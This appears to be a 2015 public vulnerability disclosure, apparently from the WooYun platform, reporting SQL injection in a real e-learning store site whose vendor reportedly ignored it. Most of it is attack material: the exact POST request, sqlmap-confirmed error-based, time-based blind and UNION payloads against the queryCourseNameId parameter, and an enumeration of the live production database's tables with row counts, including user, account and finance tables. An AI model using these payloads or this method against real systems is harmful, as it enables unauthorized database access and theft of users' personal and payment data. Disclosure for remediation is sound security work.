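2015-11-19: Details reported to the vendor; awaiting the vendor's response
2015-11-25: The vendor chose to ignore the vulnerability; details disclosed to the public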
POST /goods/goodsType!toSearchGoodsNew.jspx?type=1 HTTP/1.1
Content-Length: 582
Content-Type: application/x-www-form-urlencoded
Cookie: SESSION_COOKIE=11; JSESSIONID=5463DEDEE11F6ACF8EC7BAA20FBE0ECD
Host: mall.jinku.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

isShowOwn=&pageNo=1&queryCourseNameId=1111&searchGoodCategoryId=0&searchGoodCertificateId=0&searchGoodFormId=0&searchGoodHotTagsId=0&searchGoodHoursId=0.0&searchGoodName=&searchGoodPriceMin=0&searchGoodTagsId=&searchGoodTypeId=0&searchGoodVersionId=0&searchSortBy=0
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: queryCourseNameId (POST)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: isShowOwn=&pageNo=1&queryCourseNameId=1111') AND (SELECT 3373 FROM(SELECT COUNT(*),CONCAT(0x71787a7671,(SELECT (ELT(3373=3373,1))),0x716a707071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ('zxfn'='zxfn&searchGoodCategoryId=0&searchGoodCertificateId=0&searchGoodFormId=0&searchGoodHotTagsId=0&searchGoodHoursId=0.0&searchGoodName=&searchGoodPriceMin=0&searchGoodTagsId=&searchGoodTypeId=0&searchGoodVersionId=0&searchSortBy=0

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: isShowOwn=&pageNo=1&queryCourseNameId=1111') AND (SELECT * FROM (SELECT(SLEEP(5)))bAQF) AND ('ADUy'='ADUy&searchGoodCategoryId=0&searchGoodCertificateId=0&searchGoodFormId=0&searchGoodHotTagsId=0&searchGoodHoursId=0.0&searchGoodName=&searchGoodPriceMin=0&searchGoodTagsId=&searchGoodTypeId=0&searchGoodVersionId=0&searchSortBy=0

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 column
    Payload: isShowOwn=&pageNo=1&queryCourseNameId=1111') UNION ALL SELECT CONCAT(0x71787a7671,0x746257727a4872624e53,0x716a707071)#&searchGoodCategoryId=0&searchGoodCertificateId=0&searchGoodFormId=0&searchGoodHotTagsId=0&searchGoodHoursId=0.0&searchGoodName=&searchGoodPriceMin=0&searchGoodTagsId=&searchGoodTypeId=0&searchGoodVersionId=0&searchSortBy=0
---
web application technology: JSP
back-end DBMS: MySQL 5.0
Database: cabbage
+--------------------------------+---------+
| Table                          | Entries |
+--------------------------------+---------+
| sys_web_logger                 | 3141103 |
| study_detail                   | 2282992 |
| study_record                   | 1940376 |
| finance_con_record             | 1894992 |
| finance_con_record_bak         | 1884583 |
| study_sco_7                    | 949760  |
| study_sco_5                    | 939103  |
| study_sco_1                    | 937822  |
| study_sco_2                    | 937277  |
| study_sco_6                    | 936209  |
| study_sco_4                    | 935783  |
| study_sco_9                    | 935736  |
| study_sco_3                    | 935592  |
| study_sco_8                    | 934908  |
| study_sco                      | 931137  |
| study_sco_bak_1                | 679724  |
| study_sco_bak                  | 554562  |
| chapter_record                 | 395504  |
| v_finance_send_ticket          | 395157  |
| finance_order                  | 377426  | // orders
| useraccounts                   | 362998  |
| userinfo                       | 362997  | // users
| users                          | 362997  | // users
| testpaper_topic                | 254843  |
| finance_recharge               | 202852  |
| finance_send_ticket            | 192305  |
| study_detail_app               | 148818  |
| junkustudyrecord_temp          | 128228  |
| usersecures                    | 126264  |
| usermedals                     | 122509  |
| shoppinggood                   | 90965   |
| testpaper_report               | 90909   |
| finance_send_ticket_detail     | 74242   |
| qz_testpaper_topic             | 63428   |
| finance_invoice                | 53104   |
| shoppingcart                   | 36709   |
| userfive                       | 29145   |
| collects                       | 25999   |
| new_testpaper_topic            | 24660   |
| evaluate                       | 19346   |
| newoptions                     | 18810   |
| testpaper_topic_bak            | 14907   |
| new_testpaper_report           | 14819   |
| qz_testpaper_report            | 14771   |
| shoppingparm                   | 11411   |
| testpaper_report_bak           | 6967    |
| sys_web_phone_mes_request_info | 6583    |
| newproblem                     | 5028    |
| shopping_protocol              | 3737    |
| spike_log                      | 3472    |
| new_testpaper_report_font      | 2900    |
| options                        | 2792    |
| testpaper                      | 1950    |
| new_testpaper                  | 1773    |
| testpaper_report_font          | 1673    |
| finance_user_record            | 1353    |
| newuserfive                    | 1170    |
| sys_se_role_r_fr               | 1121    |
| course_item_credit             | 1087    |
| cards                          | 711     |
| org_buy_cards                  | 705     |
| problem                        | 699     |
| l_uo_organization              | 616     |
| qz_testpaper                   | 558     |
| item_file                      | 433     |
| discount                       | 419     |
| goods_courseware               | 413     |
| study_sco_log                  | 390     |
| book                           | 381     |
| goods_course                   | 372     |
| qz_testpaper_report_font       | 351     |
| tgglv_cfp                      | 320     |
| course                         | 286     |
| goods                          | 286     |
| courseflash                    | 265     |
| goods_files                    | 265     |
| announce                       | 244     |
| sys_operation_log              | 229     |
| goods_praise                   | 225     |
| qy_testpaper_topic             | 199     |
| tgglv                          | 181     |
| stages_newproblem              | 172     |
| friend_invite                  | 156     |
| flush_cache                    | 154     |
| problembox                     | 150     |
| xingjipm                       | 141     |
| org_discount                   | 139     |
| sys_se_function_resource       | 134     |
| spikeinfo                      | 111     |
| testpaper_bak                  | 108     |
| finance_refund_approval        | 102     |
| testpaper_report_font_bak      | 98      |
| finance_approval_study         | 76      |
| tags                           | 71      |
| exam_counseling                | 64      |
| modular_course                 | 59      |
| sys_se_user_r_role             | 54      |
| sys_se_user                    | 53      |
| sys_se_user_r_group            | 53      |
| vipprice                       | 52      |
| sys_se_role                    | 47      |
| sys_se_group_role              | 43      |
| finance_apply_study            | 38      |
| sys_web_phone_mes_request_lump | 36      |
| typebox_goods                  | 36      |
| advertis                       | 35      |
| finance_refund                 | 33      |
| companyuser                    | 24      |
| coursetutor                    | 21      |
| qy_testpaper                   | 19      |
| modular                        | 13      |
| typebox                        | 13      |
| spikemachineinfo               | 12      |
| sys_se_group                   | 12      |
| goodstype                      | 11      |
| items                          | 6       |
| l_uo_org_type                  | 6       |
| solution                       | 6       |
| machine_info                   | 5       |
| examtest                       | 4       |
| heat_sell                      | 4       |
| seckillprice                   | 4       |
| other_phone                    | 3       |
| site_activity                  | 3       |
| company                        | 2       |
| infoleft                       | 2       |
| stages                         | 2       |
| sys_message                    | 2       |
| user_msg                       | 2       |
| sysrefund                      | 1       |
| typebox_companyusers           | 1       |
+--------------------------------+---------+
Severity: No impact (ignored by vendor)
Ignored at: 2015-11-25 09:00
Vulnerability Rank: 15 (WooYun rating)
None yet